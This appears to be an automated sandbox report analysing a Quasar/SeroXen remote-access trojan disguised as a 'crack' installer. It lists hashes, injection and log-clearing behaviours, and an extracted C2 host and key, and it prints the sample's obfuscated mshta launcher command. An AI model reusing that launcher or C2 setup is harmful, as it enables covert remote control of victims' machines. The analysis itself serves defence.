Resubmissions
28-11-2024 05:26
241128-f5dh3stlbl 1028-11-2024 05:24
241128-f317cstkfp 1027-09-2024 19:50
240927-ykppqayfma 1020-08-2024 17:46
240820-wcsqasyhjm 1011-12-2023 06:01
231211-gq31vsgbh3 10Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-11-2024 05:24
Static task
static1
Behavioral task
behavioral1
Sample
SeroXen Crack/SeroXen-install.bat
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
SeroXen Crack/SeroXen-install.bat
Resource
win11-20241007-en
General
-
Target
SeroXen Crack/SeroXen-install.bat
-
Size
12.6MB
-
MD5
898f49c739026123b6a3811fa31abe70
-
SHA1
31ff6036b40d70d21cb1c4c0163cba0d4c720551
-
SHA256
78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f
-
SHA512
a9aa2bf15db84361f315156ee6386cac49c14c2449a72e2f50b2e0b8d100781019c246c03a38a37d5dfc71a7c1c5451457faba074d1a875cab615ecb8d3e453d
-
SSDEEP
49152:sW7ldCjqzV0qZpSjVbHDGYxqXTQPJee/X5nerh1gnfFijx6ygGSPlPNEIKlfuK1u:i
Malware Config
Extracted
quasar
1.0.0.0
v2.2.5 | SeroXen
kimsoylak.ddns.net:4782
2cc9d61f-950d-4f23-b7d5-45d9dda2f256
-
encryption_key
F467D794B2E1081B6AD1EAD5813AFA74F053248D
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
1
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/4556-69-0x0000023F27D20000-0x0000023F284EA000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 5928 created 5836 5928 WerFault.exe 95 PID 2428 created 3600 2428 WerFault.exe 101 PID 1720 created 4908 1720 WerFault.exe 103 PID 1980 created 4600 1980 WerFault.exe 109 -
Suspicious use of NtCreateUserProcessOtherParentProcess 14 IoCs
description pid Process procid_target PID 4320 created 648 4320 SeroXen-install.bat.exe 5 PID 4556 created 648 4556 $sxr-powershell.exe 5 PID 4556 created 648 4556 $sxr-powershell.exe 5 PID 4320 created 648 4320 SeroXen-install.bat.exe 5 PID 4556 created 648 4556 $sxr-powershell.exe 5 PID 4556 created 648 4556 $sxr-powershell.exe 5 PID 5884 created 5836 5884 svchost.exe 95 PID 4556 created 648 4556 $sxr-powershell.exe 5 PID 5884 created 3600 5884 svchost.exe 101 PID 5884 created 4908 5884 svchost.exe 103 PID 4556 created 648 4556 $sxr-powershell.exe 5 PID 4556 created 648 4556 $sxr-powershell.exe 5 PID 5884 created 4600 5884 svchost.exe 109 PID 5884 created 2112 5884 svchost.exe 113 -
Deletes itself 1 IoCs
pid Process 4320 SeroXen-install.bat.exe -
Executes dropped EXE 5 IoCs
pid Process 4320 SeroXen-install.bat.exe 3124 $sxr-mshta.exe 5016 $sxr-cmd.exe 4556 $sxr-powershell.exe 4752 $sxr-powershell.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx svchost.exe -
Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 4556 $sxr-powershell.exe 4752 $sxr-powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 18 IoCs
description pid Process procid_target PID 4320 set thread context of 4884 4320 SeroXen-install.bat.exe 80 PID 4320 set thread context of 2228 4320 SeroXen-install.bat.exe 81 PID 4556 set thread context of 2708 4556 $sxr-powershell.exe 86 PID 4556 set thread context of 3468 4556 $sxr-powershell.exe 87 PID 4556 set thread context of 352 4556 $sxr-powershell.exe 89 PID 4556 set thread context of 4832 4556 $sxr-powershell.exe 90 PID 4320 set thread context of 3372 4320 SeroXen-install.bat.exe 91 PID 4320 set thread context of 1920 4320 SeroXen-install.bat.exe 92 PID 4556 set thread context of 4364 4556 $sxr-powershell.exe 93 PID 4556 set thread context of 5732 4556 $sxr-powershell.exe 94 PID 4556 set thread context of 5836 4556 $sxr-powershell.exe 95 PID 4556 set thread context of 72 4556 $sxr-powershell.exe 100 PID 4556 set thread context of 3600 4556 $sxr-powershell.exe 101 PID 4556 set thread context of 4908 4556 $sxr-powershell.exe 103 PID 4556 set thread context of 5364 4556 $sxr-powershell.exe 107 PID 4556 set thread context of 2704 4556 $sxr-powershell.exe 108 PID 4556 set thread context of 4600 4556 $sxr-powershell.exe 109 PID 4556 set thread context of 3688 4556 $sxr-powershell.exe 111 -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\$sxr-powershell.exe SeroXen-install.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe SeroXen-install.bat.exe File created C:\Windows\$sxr-mshta.exe SeroXen-install.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe SeroXen-install.bat.exe File created C:\Windows\$sxr-cmd.exe SeroXen-install.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe SeroXen-install.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4568 4908 WerFault.exe 103 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WerFault.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2112 cmd.exe -
Checks processor information in registry 2 TTPs 37 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 14 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732771667" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 28 Nov 2024 05:27:48 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={2FD06E4E-2180-40F1-BCCA-DD4ED377B767}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4320 SeroXen-install.bat.exe 4320 SeroXen-install.bat.exe 4320 SeroXen-install.bat.exe 4884 dllhost.exe 4884 dllhost.exe 2228 dllhost.exe 2228 dllhost.exe 2228 dllhost.exe 2228 dllhost.exe 4884 dllhost.exe 4884 dllhost.exe 4320 SeroXen-install.bat.exe 4320 SeroXen-install.bat.exe 4556 $sxr-powershell.exe 4556 $sxr-powershell.exe 4556 $sxr-powershell.exe 4556 $sxr-powershell.exe 2708 dllhost.exe 2708 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 2708 dllhost.exe 2708 dllhost.exe 3468 dllhost.exe 3468 dllhost.exe 4556 $sxr-powershell.exe 4556 $sxr-powershell.exe 4752 $sxr-powershell.exe 4752 $sxr-powershell.exe 4556 $sxr-powershell.exe 4752 $sxr-powershell.exe 4752 $sxr-powershell.exe 352 dllhost.exe 352 dllhost.exe 352 dllhost.exe 352 dllhost.exe 352 dllhost.exe 352 dllhost.exe 352 dllhost.exe 352 dllhost.exe 4832 dllhost.exe 4832 dllhost.exe 4832 dllhost.exe 4832 dllhost.exe 352 dllhost.exe 352 dllhost.exe 4832 dllhost.exe 4832 dllhost.exe 352 dllhost.exe 352 dllhost.exe 4832 dllhost.exe 4832 dllhost.exe 352 dllhost.exe 352 dllhost.exe 4832 dllhost.exe 4832 dllhost.exe 352 dllhost.exe 352 dllhost.exe 4832 dllhost.exe 4832 dllhost.exe 352 dllhost.exe 352 dllhost.exe 4832 dllhost.exe 4832 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4320 SeroXen-install.bat.exe Token: SeDebugPrivilege 4320 SeroXen-install.bat.exe Token: SeDebugPrivilege 4884 dllhost.exe Token: SeDebugPrivilege 2228 dllhost.exe Token: SeDebugPrivilege 4556 $sxr-powershell.exe Token: SeDebugPrivilege 4556 $sxr-powershell.exe Token: SeDebugPrivilege 2708 dllhost.exe Token: SeDebugPrivilege 3468 dllhost.exe Token: SeDebugPrivilege 4752 $sxr-powershell.exe Token: SeDebugPrivilege 4556 $sxr-powershell.exe Token: SeDebugPrivilege 352 dllhost.exe Token: SeDebugPrivilege 4832 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2696 svchost.exe Token: SeIncreaseQuotaPrivilege 2696 svchost.exe Token: SeSecurityPrivilege 2696 svchost.exe Token: SeTakeOwnershipPrivilege 2696 svchost.exe Token: SeLoadDriverPrivilege 2696 svchost.exe Token: SeSystemtimePrivilege 2696 svchost.exe Token: SeBackupPrivilege 2696 svchost.exe Token: SeRestorePrivilege 2696 svchost.exe Token: SeShutdownPrivilege 2696 svchost.exe Token: SeSystemEnvironmentPrivilege 2696 svchost.exe Token: SeUndockPrivilege 2696 svchost.exe Token: SeManageVolumePrivilege 2696 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2696 svchost.exe Token: SeIncreaseQuotaPrivilege 2696 svchost.exe Token: SeSecurityPrivilege 2696 svchost.exe Token: SeTakeOwnershipPrivilege 2696 svchost.exe Token: SeLoadDriverPrivilege 2696 svchost.exe Token: SeSystemtimePrivilege 2696 svchost.exe Token: SeBackupPrivilege 2696 svchost.exe Token: SeRestorePrivilege 2696 svchost.exe Token: SeShutdownPrivilege 2696 svchost.exe Token: SeSystemEnvironmentPrivilege 2696 svchost.exe Token: SeUndockPrivilege 2696 svchost.exe Token: SeManageVolumePrivilege 2696 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2696 svchost.exe Token: SeIncreaseQuotaPrivilege 2696 svchost.exe Token: SeSecurityPrivilege 2696 svchost.exe Token: SeTakeOwnershipPrivilege 2696 svchost.exe Token: SeLoadDriverPrivilege 2696 svchost.exe Token: SeSystemtimePrivilege 2696 svchost.exe Token: SeBackupPrivilege 2696 svchost.exe Token: SeRestorePrivilege 2696 svchost.exe Token: SeShutdownPrivilege 2696 svchost.exe Token: SeSystemEnvironmentPrivilege 2696 svchost.exe Token: SeUndockPrivilege 2696 svchost.exe Token: SeManageVolumePrivilege 2696 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2696 svchost.exe Token: SeIncreaseQuotaPrivilege 2696 svchost.exe Token: SeSecurityPrivilege 2696 svchost.exe Token: SeTakeOwnershipPrivilege 2696 svchost.exe Token: SeLoadDriverPrivilege 2696 svchost.exe Token: SeSystemtimePrivilege 2696 svchost.exe Token: SeBackupPrivilege 2696 svchost.exe Token: SeRestorePrivilege 2696 svchost.exe Token: SeShutdownPrivilege 2696 svchost.exe Token: SeSystemEnvironmentPrivilege 2696 svchost.exe Token: SeUndockPrivilege 2696 svchost.exe Token: SeManageVolumePrivilege 2696 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2696 svchost.exe Token: SeIncreaseQuotaPrivilege 2696 svchost.exe Token: SeSecurityPrivilege 2696 svchost.exe Token: SeTakeOwnershipPrivilege 2696 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4556 $sxr-powershell.exe 5460 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3844 wrote to memory of 4320 3844 cmd.exe 78 PID 3844 wrote to memory of 4320 3844 cmd.exe 78 PID 4320 wrote to memory of 4884 4320 SeroXen-install.bat.exe 80 PID 4320 wrote to memory of 4884 4320 SeroXen-install.bat.exe 80 PID 4320 wrote to memory of 4884 4320 SeroXen-install.bat.exe 80 PID 4320 wrote to memory of 4884 4320 SeroXen-install.bat.exe 80 PID 4320 wrote to memory of 4884 4320 SeroXen-install.bat.exe 80 PID 4320 wrote to memory of 4884 4320 SeroXen-install.bat.exe 80 PID 4320 wrote to memory of 4884 4320 SeroXen-install.bat.exe 80 PID 4320 wrote to memory of 2228 4320 SeroXen-install.bat.exe 81 PID 4320 wrote to memory of 2228 4320 SeroXen-install.bat.exe 81 PID 4320 wrote to memory of 2228 4320 SeroXen-install.bat.exe 81 PID 4320 wrote to memory of 2228 4320 SeroXen-install.bat.exe 81 PID 4320 wrote to memory of 2228 4320 SeroXen-install.bat.exe 81 PID 4320 wrote to memory of 2228 4320 SeroXen-install.bat.exe 81 PID 4320 wrote to memory of 2228 4320 SeroXen-install.bat.exe 81 PID 4320 wrote to memory of 2228 4320 SeroXen-install.bat.exe 81 PID 4320 wrote to memory of 2228 4320 SeroXen-install.bat.exe 81 PID 3124 wrote to memory of 5016 3124 $sxr-mshta.exe 83 PID 3124 wrote to memory of 5016 3124 $sxr-mshta.exe 83 PID 5016 wrote to memory of 4556 5016 $sxr-cmd.exe 85 PID 5016 wrote to memory of 4556 5016 $sxr-cmd.exe 85 PID 4556 wrote to memory of 2708 4556 $sxr-powershell.exe 86 PID 4556 wrote to memory of 2708 4556 $sxr-powershell.exe 86 PID 4556 wrote to memory of 2708 4556 $sxr-powershell.exe 86 PID 4556 wrote to memory of 2708 4556 $sxr-powershell.exe 86 PID 4556 wrote to memory of 2708 4556 $sxr-powershell.exe 86 PID 4556 wrote to memory of 2708 4556 $sxr-powershell.exe 86 PID 4556 wrote to memory of 2708 4556 $sxr-powershell.exe 86 PID 4556 wrote to memory of 3468 4556 $sxr-powershell.exe 87 PID 4556 wrote to memory of 3468 4556 $sxr-powershell.exe 87 PID 4556 wrote to memory of 3468 4556 $sxr-powershell.exe 87 PID 4556 wrote to memory of 3468 4556 $sxr-powershell.exe 87 PID 4556 wrote to memory of 3468 4556 $sxr-powershell.exe 87 PID 4556 wrote to memory of 3468 4556 $sxr-powershell.exe 87 PID 4556 wrote to memory of 3468 4556 $sxr-powershell.exe 87 PID 4556 wrote to memory of 3468 4556 $sxr-powershell.exe 87 PID 4556 wrote to memory of 3468 4556 $sxr-powershell.exe 87 PID 4556 wrote to memory of 4752 4556 $sxr-powershell.exe 88 PID 4556 wrote to memory of 4752 4556 $sxr-powershell.exe 88 PID 4556 wrote to memory of 352 4556 $sxr-powershell.exe 89 PID 4556 wrote to memory of 352 4556 $sxr-powershell.exe 89 PID 4556 wrote to memory of 352 4556 $sxr-powershell.exe 89 PID 4556 wrote to memory of 352 4556 $sxr-powershell.exe 89 PID 4556 wrote to memory of 352 4556 $sxr-powershell.exe 89 PID 4556 wrote to memory of 352 4556 $sxr-powershell.exe 89 PID 4556 wrote to memory of 352 4556 $sxr-powershell.exe 89 PID 4556 wrote to memory of 352 4556 $sxr-powershell.exe 89 PID 4556 wrote to memory of 352 4556 $sxr-powershell.exe 89 PID 352 wrote to memory of 648 352 dllhost.exe 5 PID 352 wrote to memory of 700 352 dllhost.exe 7 PID 352 wrote to memory of 1000 352 dllhost.exe 12 PID 352 wrote to memory of 568 352 dllhost.exe 13 PID 352 wrote to memory of 716 352 dllhost.exe 14 PID 352 wrote to memory of 1040 352 dllhost.exe 15 PID 352 wrote to memory of 1052 352 dllhost.exe 16 PID 352 wrote to memory of 1172 352 dllhost.exe 18 PID 352 wrote to memory of 1228 352 dllhost.exe 19 PID 352 wrote to memory of 1240 352 dllhost.exe 20 PID 352 wrote to memory of 1268 352 dllhost.exe 21 PID 352 wrote to memory of 1316 352 dllhost.exe 22 PID 352 wrote to memory of 1328 352 dllhost.exe 23 PID 352 wrote to memory of 1444 352 dllhost.exe 24 PID 352 wrote to memory of 1584 352 dllhost.exe 25 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:648
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:568
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5f579a5c-a4b1-49ed-ab0f-9a096242fff6}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{fce48b0b-abb1-4d0b-8a08-8779b530ffbf}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{463fb102-40ea-4d61-bfbf-6c0e02bf0dfa}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:352
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{380c80c7-fdc7-4e94-8aa9-bfe696a7e988}2⤵PID:3372
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ebd8df80-7d99-4b6c-83f9-fd149f4d6dbc}2⤵PID:4364
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7f71aee9-a0d5-45c4-ac81-98b1ca8ca1cb}2⤵PID:5836
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5836 -s 3163⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5984
-
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f13d947e-501b-4649-bfa8-198ad931d852}2⤵PID:3600
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3600 -s 3123⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5172
-
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0bd2c3d5-9b63-49c1-967a-a50e9a19a60a}2⤵PID:5364
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6c15f563-0007-492f-b24e-bc451a585cf6}2⤵PID:4600
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4600 -s 4163⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4976
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1000
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1172
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1240
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4452
-
-
